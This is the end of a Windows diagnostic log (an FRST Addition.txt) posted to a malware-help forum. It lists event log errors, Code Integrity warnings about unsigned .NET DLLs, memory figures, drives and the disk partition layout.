 
Error: (10/13/2016 11:41:40 AM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk1\DR1.
 
Error: (10/13/2016 11:41:35 AM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: DCOM got error "1084" attempting to start the service dps with arguments "Unavailable" in order to run the server:
{DDCFD26B-FEED-44CD-B71D-79487D2E5E5A}
 
Error: (10/13/2016 11:41:35 AM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: DCOM got error "1084" attempting to start the service dps with arguments "Unavailable" in order to run the server:
{DDCFD26B-FEED-44CD-B71D-79487D2E5E5A}
 
Error: (10/13/2016 11:41:35 AM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: DCOM got error "1084" attempting to start the service dps with arguments "Unavailable" in order to run the server:
{DDCFD26B-FEED-44CD-B71D-79487D2E5E5A}
 
 
CodeIntegrity:
===================================
  Date: 2016-10-06 10:12:30.824
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume1\Windows\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2016-10-06 10:12:30.757
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume1\Windows\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2016-10-06 10:12:30.644
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume1\Windows\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2016-10-06 10:12:30.600
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume1\Windows\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2016-10-06 10:12:28.471
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume1\Windows\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2016-10-06 10:12:27.843
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume1\Windows\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i3 CPU M 370 @ 2.40GHz
Percentage of memory in use: 72%
Total physical RAM: 1780.36 MB
Available physical RAM: 497.29 MB
Total Virtual: 3572.36 MB
Available Virtual: 1713.03 MB
 
==================== Drives ================================
 
Drive c: (system) (Fixed) (Total:157.2 GB) (Free:11.94 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (data) (Fixed) (Total:140.44 GB) (Free:21.74 GB) NTFS
Drive h: (SORIN 3_6GB) (Removable) (Total:3.67 GB) (Free:0.17 GB) FAT32
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 8C41C3FA)
Partition 1: (Active) - (Size=157.2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=450 MB) - (Type=27)
Partition 3: (Not Active) - (Size=140.4 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (Size: 3.7 GB) (Disk ID: 00000000)
 
Partition: GPT.
 
==================== End of Addition.txt ============================

 


  • 0

Advertisements







Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP